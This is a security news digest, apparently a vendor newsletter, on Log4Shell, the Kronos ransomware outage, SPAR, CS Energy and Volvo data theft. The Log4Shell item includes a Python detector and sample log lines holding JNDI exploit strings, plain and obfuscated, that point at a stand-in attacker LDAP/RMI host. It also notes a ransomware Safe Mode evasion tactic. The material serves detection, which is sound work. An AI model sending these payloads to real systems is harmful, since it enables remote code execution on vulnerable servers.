[Security Weekly] Apache Log4j Vulnerability Exploited by Attackers Worldwide


December 2021, Issue II


1. Apache Log4j flaw exploited by attackers worldwide, over 20,000 attempts per minute

Characterized by many cybersecurity experts as the “worst vulnerability of the decade”, the Apache Log4j vulnerability, also known as Log4Shell or CVE-2021-44228 (some reports also call it LogJam, a name otherwise used for an unrelated 2015 TLS flaw), is now being exploited by state-backed threat actors and ransomware gangs across the globe.

Apache Log4j is a Java logging library, and one of the most widely used anywhere; developers rely on it to record application events and retrieve them later for debugging, auditing, and monitoring. First disclosed on December 9, Log4Shell affects the Log4j 2.x line from 2.0-beta9 through 2.14.1, and because the library is embedded in countless applications and products, a very large share of the Java software in use is potentially exposed. Experts now worry that worms could be written for fast-spreading, fully automated attacks.

The bug is in Log4j’s message lookup substitution. If a string such as ${jndi:ldap://<attacker host>/a} ends up anywhere in a logged message (a User-Agent header, a username, a search term), Log4j performs a JNDI lookup against the attacker’s LDAP server, which responds with a reference to a remote Java class; the vulnerable application then loads and runs that class, giving the attacker remote code execution (RCE). Because any attacker-controlled input that gets logged is a trigger, exploitation needs no authentication at all. Cloudflare reported an average of 27,439 exploitation attempts per minute on December 12.

WAPPLES customers are protected against these exploitation attempts by its logical detection rules. Nonetheless, all Log4j users are advised to update immediately. Note that 2.15.0, the first fix, was quickly found to be incomplete (CVE-2021-45046) and has since been superseded by 2.16.0 and then 2.17.0 (which also addresses the CVE-2021-45105 denial-of-service issue); install the latest 2.x release for your Java version rather than stopping at 2.15.0, and treat the log4j2.formatMsgNoLookups=true workaround as a stopgap, not a fix.
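Any signature-based detection of this attack has to cope with the obfuscations attackers use against a naive ${jndi: match: URL encoding (often applied twice), Log4j’s own ${lower:} and ${upper:} lookups, and the ${key:-default} syntax, nested so that the trigger is only spelled out after substitution. The Python script below is an added example written for this newsletter, not a WAPPLES rule and not code from the Log4j project. It normalises a log line the way Log4j’s string substitution would and then reports the JNDI protocol the lookup would reach out over. The log lines and the 203.0.113.x and 198.51.100.x addresses are constructed sample data.

```python
"""Detect Log4Shell (CVE-2021-44228) JNDI lookup strings in request logs.

Added example for this newsletter, not a WAPPLES rule or Log4j code. It
resolves the obfuscations attackers use against naive '${jndi:' signatures
(URL encoding, ${lower:}/${upper:}, the ${key:-default} syntax, nesting)
by evaluating the lookups the way Log4j's string substitution would, then
checks for a JNDI lookup and reports the protocol it would use.
"""
import re
from urllib.parse import unquote

# An innermost ${...}: its body contains no further '${' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What a canonical payload looks like after normalisation.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)


def _resolve_inner(match):
    """Evaluate one innermost lookup the way obfuscated payloads rely on.

    ${lower:X} / ${upper:X}  -> X in that case
    ${key:-X}, ${::-X}       -> default-value syntax, yields X
    ${jndi:...}              -> kept as-is, this is what we look for
    anything else (date:, sys:, env:NAME) -> opaque marker: its real value
    is host-dependent, and it must not be allowed to spell out 'jndi' here.
    """
    body = match.group(1)
    if re.match(r"\s*jndi\s*:", body, re.IGNORECASE):
        return match.group(0)
    case = re.fullmatch(r"\s*(lower|upper)\s*:(.*)", body, re.IGNORECASE | re.DOTALL)
    if case:
        value = case.group(2)
        return value.lower() if case.group(1).lower() == "lower" else value.upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return "\x00"


def normalize(text, max_rounds=32):
    """URL-decode twice (payloads are often double-encoded) and resolve
    lookups from the inside out until nothing changes or the round budget
    is spent, so deeply nested input cannot make the scanner loop forever."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        resolved = _INNER.sub(_resolve_inner, text)
        if resolved == text:
            break
        text = resolved
    return text


def jndi_scheme(line):
    """Return the JNDI protocol (ldap, ldaps, rmi, dns, ...) a logged line
    would trigger a lookup over, or None if no JNDI lookup survives
    normalisation."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return (line_number, scheme) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        scheme = jndi_scheme(line)
        if scheme:
            hits.append((n, scheme))
    return hits


# Constructed sample access-log lines (not real traffic); 203.0.113.0/24 is a
# documentation range used here as the attacker's listener address.
SAMPLE_LOG = [
    '198.51.100.7 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.8 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.9 - - "GET / HTTP/1.1" 200 '
    '"${${lower:J}${upper:n}${::-d}${env:NOPE:-i}:${lower:LDAP}://203.0.113.5/x}"',
    '198.51.100.10 - - "GET /?q=%2524%257Bjndi%253Armi%253A%252F%252F203.0.113.5%252Fo%257D HTTP/1.1" 200 "-"',
    '198.51.100.11 - - "GET / HTTP/1.1" 200 "${date:yyyy-MM-dd} ${sys:java.version}"',
]

if __name__ == "__main__":
    for n, scheme in scan(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup over {scheme}")
```

Run as-is it flags sample lines 2 to 4 (ldap, ldap, rmi) and leaves the benign lines alone; in practice, feed it the request lines from your access or WAF logs. A stricter rule would also alert on any unresolved ${...} lookup in untrusted input, since the value of an ${env:...} or ${sys:...} reference depends on the host and cannot be evaluated offline.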


2. Ransomware attack on Kronos HR management platform delays payrolls

Kronos, an HR management platform used by many large corporations, governments, and universities, suffered a severe ransomware attack that is expected to keep its cloud-based services offline for several weeks.

Kronos’ parent company UKG said the ransomware intrusion was first discovered on December 11 and that it compromised Kronos Private Cloud, whose servers host several critical HR management services including UKG Workforce Central, UKG TeleStaff, Healthcare Extensions, and Bank Scheduling Solutions.

UKG notified affected client firms that the services may not resume for several weeks and asked them to activate contingency plans for payroll and other urgent HR tasks. It also warned that employee information, including names, addresses, and social security numbers (SSNs), may have been accessed by the attackers.

The timing could hardly be worse, with Christmas only a week away. Many affected companies have told their employees that their pay would be delayed, and the outage of the vacation tracking and management tools poses a further challenge for HR just as employees take their holiday leave.

Sources: ZDNet, Threatpost


3. SPAR supermarket chain experiences store closures following cyberattack

SPAR, a Dutch-headquartered retail chain with over 13,000 independently owned supermarkets and convenience stores across 48 countries, suffered a cyberattack that caused an IT outage affecting around 330 stores in the north of England.

Disruptions began on December 5 and continued through the week. Hundreds of affected stores were unable to process card payments, and employees could not access accounting and inventory management systems, forcing many stores to close for an indefinite period.

A SPAR spokesperson said that some of the store closures were caused by a cyberattack on James Hall & Co Ltd., a regional supplier to SPAR. It was not specified whether these were two separate incidents or a single supply chain attack, in which the compromise of the supplier’s systems is what took the stores offline.

Sources: Infosecurity, Guardian


4. Queensland energy generator hit by reportedly state-backed ransomware attack

CS Energy, a government-owned power generation company in Queensland, Australia, suffered a ransomware attack in late November that media reports later attributed to Chinese state hackers, although the company itself did not confirm a state-backed actor. Had the attackers reached the plants’ operational technology (OT), the attack could have disrupted power supply for up to three million homes.

The attackers compromised CS Energy’s corporate IT network, with the apparent aim of moving from there into the OT systems of its two coal-fired power stations, Kogan Creek Power Station and Callide B Power Station. Together these stations supply 3,500 megawatts to the grid, enough to power up to three million homes.

Fortunately, the company’s IT staff immediately isolated the OT network from the corporate IT network, so the ransomware never reached the power stations and generation was unaffected. The corporate IT systems were hit, however, leaving employees without access to email and internal data.

Over the past year, cyberattacks on critical infrastructure such as pipelines, fuel distribution, and power plants have become increasingly common. The CS Energy case shows why IT/OT segmentation matters: governments and infrastructure operators must keep the two networks separated and be able to cut the links between them the moment the IT side is compromised.

Sources: IT PRO, Daily Mail


5. Volvo Cars’ R&D data stolen by Snatch ransomware gang

Volvo Cars disclosed a cyberattack on one of its file repositories in which some of its research and development (R&D) data was stolen. Volvo said it had hired third-party cybersecurity experts to investigate the incident and that, based on the information available, customer and vehicle data were not affected.

Although the company did not specify the type of attack, the Snatch ransomware gang claimed responsibility on its leak site on November 30, publishing 35.9 MB of sample files and screenshots of the stolen data as proof.

The Snatch ransomware gang is known for a distinctive tactic: forcing Windows PCs to reboot into Safe Mode before encrypting them. Safe Mode starts only a minimal set of drivers and services, so most endpoint protection agents are not running when the encryption begins.

Sources: Bleeping Computer, IT News


Check out Penta Security’s product lines:

Web Application Firewall: WAPPLES

Database Encryption: D’Amo

Identity and Access Management: iSIGN+ 

Car, Energy, Factory, City Solutions: Penta IoT Security